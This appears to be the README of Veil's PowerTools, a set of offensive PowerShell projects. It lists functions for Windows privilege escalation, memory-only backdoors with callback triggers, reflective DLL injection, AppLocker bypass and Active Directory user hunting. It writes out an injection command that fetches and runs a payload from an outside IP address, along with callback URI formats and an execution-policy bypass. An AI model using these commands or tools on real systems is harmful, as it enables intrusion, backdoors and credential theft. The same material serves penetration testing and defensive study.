Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.
This collection contains five projects:
PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, vulnerable schtasks, and more.
Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name Get-ServiceFilePermission - returns services where the current user can write to the service binary path or its config Get-ServicePermission - returns services the current user can modify
Invoke-ServiceUserAdd - modifies a modifiable service to create a user and add it to the local administrators Invoke-ServiceCMD - execute an arbitrary command through service abuse Write-UserAddServiceBinary - writes out a patched C# service binary that adds a local administrative user Write-CMDServiceBinary - writes out a patched C# binary that executes a custom command Write-ServiceEXE - replaces a service binary with one that adds a local administrator user Write-ServiceEXECMD - replaces a service binary with one that executes a custom command Restore-ServiceEXE - restores a replaced service binary with the original executable Invoke-ServiceStart - starts a given service Invoke-ServiceStop - stops a given service Invoke-ServiceEnable - enables a given service Invoke-ServiceDisable - disables a given service Get-ServiceDetail - returns detailed information about a service
Find-DLLHijack - finds .dll hijacking opportunities for currently running processes Find-PathHijack - finds service %PATH% .dll hijacking opportunities Write-HijackDll - writes out a hijackable .dll
Get-RegAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set Get-RegAutoLogon - checks for Autologon credentials in the registry Get-VulnAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
Get-VulnSchTask - find schtasks with modifiable target files Get-UnattendedInstallFile - finds remaining unattended installation files Get-Webconfig - checks for any encrypted web.config strings Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords Write-UserAddMSI - write out a MSI installer that prompts for a user to be added Invoke-AllChecks - runs all current escalation checks and returns a report
PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system. It focuses on diversifying the "trigger" methods which allows the user flexibility on how to signal to the backdoor that it needs to phone home. PowerBreach focuses on memory only methods that do not persist across a reboot without further assistance and is not a silver bullet when it comes to cover communications.
Add-PSFirewallRules - Adds powershell to the firewall on 65K ports. Required Admin Invoke-CallbackIEX - The location for the various callback mechanisms. Calls back and executes encoded payload.
Invoke-EventLogBackdoor: Monitors for failed RDP login attempts. Admin-Yes, Firewall-No, Auditing Reqd Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No, Firewall-Yes Invoke-ResolverBackdoor: Resolves name to decide when to callback. Admin-No, Firewall-No Invoke-PortKnockBackdoor: Starts sniffer looking for trigger. Admin-Yes, Firewall-Yes Invoke-LoopBackdoor: Callsback on set interval. Admin-No, Firewall-No Invoke-DeadUserBackdoor: Looks for "dead" user and calls back when does not exist. Admin-No, Firewall-No
Callback URIs Available:
http://<host:port/resource> - Perform standard http callback https://<host:port/resource> - Perform standard https callback dnstxt://<host> - Resolve DNS text record for host which is the payload
This project focuses on allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the Powershell scripts.
Many thanks to those in the offensive powershell community. This work is not ground breaking but hopefully will motivate offense and defense to understand the implications and lack of protections available.
This project provides a powershell scipt (psinject.ps1) which implements the Invoke-PSInject function. This script is based off Powersploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL. It allows for the replacement of the callback URL that is hard coded into the DLL. See this script for more details.
The script that it calls back for must be base64 encoded. To do this, you can simply use the built in linux utility 'base64'.
import-module psinject.ps1 Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://22.214.171.124/favicon.ico
This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. Due to its' reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process, not just Powershell.exe. It extends inject/migrate capabilities into powershell.
This DLL is meant to be used with PSInject.ps1 which provide the ability to modify the hardcoded callback URL or with Metasploit after compiling or patching the URL manually.
This project is a .NET executable which allows execution of Powershell code through a number of methods. The script can be embedded as a resource, read from a url, appeneded to the binary, or read from a file. It was originally used as a proof of concept to demonstrate/test the blocking of powershell and bypass of applocker.
sharppick.exe [<flag> <argument>] flags: -f <file> : Read script from specified file -r <resource name> : Read script from specified resource -d <url> : Read script from URL -a <delimeter> : Read script appended to current binary after specified delimeter. Delimeter should be very very unique string
More SharpPick details here
This repo contains scripts that utilize a common pattern to host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server, and then post-process any results.
More details here
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
It also impements various useful metafunctions, including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See function descriptions for appropriate usage and available options.
To run on a machine, start PowerShell with "powershell -exec bypass" and then load the PowerView module with: PS> Import-Module .\powerview.psm1 or load the PowerView script by itself: PS> Import-Module .\powerview.ps1
For detailed output of underlying functionality, pass the -Debug flag to most functions.
For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.
Export-PowerViewCSV - thread-safe CSV append Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit) Copy-ClonedFile - copies a local file to a remote location, matching MAC properties Get-IPAddress - resolves a hostname to an IP Test-Server - tests connectivity to a specified server Convert-NameToSid - converts a given user/group name to a security identifier (SID) Convert-SidToName - converts a security identifier (SID) to a group/user name Convert-NT4toCanonical - converts a user/group NT4 name (i.e. dev/john) to canonical format Get-Proxy - enumerates local proxy settings Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion Get-UserProperty - returns all properties specified for users, or a set of user:prop names Get-ComputerProperty - returns all properties specified for computers, or a set of computer:prop names Find-InterestingFile - search a local or remote path for files with specific terms in the name Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host Get-DomainSearcher - builds a proper ADSI searcher object for a given domain Get-ObjectAcl - returns the ACLs associated with a specific active directory object Add-ObjectAcl - adds an ACL to a specified active directory object Invoke-ACLScanner - enumerate -1000+ modifable ACLs on a specified domain Get-GUIDMap - returns a hash table of current GUIDs -> display names Get-DomainSID - return the SID for the specified domain Invoke-ThreadedFunction - helper that wraps threaded invocation for other functions
net * Functions:
Get-NetDomain - gets the name of the current user's domain Get-NetForest - gets the forest associated with the current user's domain Get-NetForestDomain - gets all domains for the current forest Get-NetDomainController - gets the domain controllers for the current computer's domain Get-NetUser - returns all user objects, or the user specified (wildcard specifiable) Add-NetUser - adds a local or domain user Get-NetComputer - gets a list of all current servers in the domain Get-NetPrinter - gets an array of all current computers objects in a domain Get-NetOU - gets data for domain organization units Get-NetSite - gets current sites in a domain Get-NetSubnet - gets registered subnets for a domain Get-NetGroup - gets a list of all current groups in a domain Get-NetGroupMember - gets a list of all current users in a specified domain group Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts Add-NetGroupUser - adds a local or domain user to a local or domain group Get-NetFileServer - get a list of file servers used by current domain users Get-DFSshare - gets a list of all distribute file system shares on a domain Get-NetShare - gets share information for a specified server Get-NetLoggedon - gets users actively logged onto a specified server Get-NetSession - gets active sessions on a specified server Get-NetRDPSession - gets active RDP sessions for a specified server (like qwinsta) Get-LastLoggedOn - return the last logged on user for a target host Get-NetProcess - gets the remote processes and owners on a remote server Get-UserEvent - returns logon or TGT events from the event log for a specified host Get-ADObject - takes a domain SID and returns the user, group, or computer object associated with it Set-ADObject - takes a SID, name, or SamAccountName to query for a specified domain object, and then sets a specified 'PropertyName' to a specified 'PropertyValue'
Get-GptTmpl - parses a GptTmpl.inf to a custom object Get-NetGPO - gets all current GPOs for a given domain Get-NetGPOGroup - gets all GPOs in a domain that set "Restricted Groups" on on target machines Find-GPOLocation - takes a user/group and makes machines they have effective rights over through GPO enumeration and correlation Find-GPOComputerAdmin - takes a computer and determines who has admin rights over it through GPO enumeration Get-DomainPolicy - returns the default domain or DC policy
Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users Invoke-ProcessHunter - hunts for processes with a specific name or owned by a specific user on domain machines Invoke-UserEventHunter - hunts for user logon events in domain controller event logs
Domain Trust Functions:
Get-NetDomainTrust - gets all trusts for the current user's domain Get-NetForestTrust - gets all trusts for the forest associated with the current user's domain Find-ForeignUser - enumerates users who are in groups outside of their principal domain Find-ForeignGroup - enumerates all the members of a domain's groups and finds users that are outside of the queried domain Invoke-MapDomainTrust - try to build a relational mapping of all domain trusts
Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to Find-UserField - searches a user field for a particular term Find-ComputerField - searches a computer field for a particular term Get-ExploitableSystem - finds systems likely vulnerable to common exploits Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators groups across all machines in the domain